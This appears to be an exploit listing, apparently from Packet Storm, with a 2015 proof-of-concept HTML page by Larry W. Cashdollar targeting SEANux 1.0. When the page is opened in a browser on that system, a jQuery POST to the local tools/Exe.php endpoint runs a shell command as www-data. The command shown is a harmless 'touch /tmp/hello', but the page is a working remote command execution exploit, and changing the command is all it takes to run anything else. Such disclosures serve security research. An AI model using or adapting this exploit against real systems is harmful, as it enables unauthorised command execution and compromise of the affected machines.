SEANux version 1.0 remote command execution exploit that executes as www-data.
c69564190cc4edb5f8372673b0b013f53a6e1591b4c20d0e40bb202e5c650f7c<!-- PoC for http://www.vapid.dhs.org/blog/01-23-2015/
Larry W. Cashdollar
@_larry0
2/9/2015
Browse to this page using any browser in SEANux v1.0 to execute commands as www-data.
--!>
<html>
<head>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
<script>
$(document).ready(function(){
$.post("http://localhost/tools/Exe.php",
{
cmd: "touch /tmp/hello",
execute: "Execute"
},
function(data,status){
alert("Data: " + data + "\nResult: " + status);
});
});
</script>
</head>
<body>
<h2>
Hello! You just executed the "touch /tmp/hello" command as www-data on your SEANux 1.0 installation.
</h2>
<hr>
<br>
<a href="http://www.vapid.dhs.org/blog/01-23-2015/">Details Here</a>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed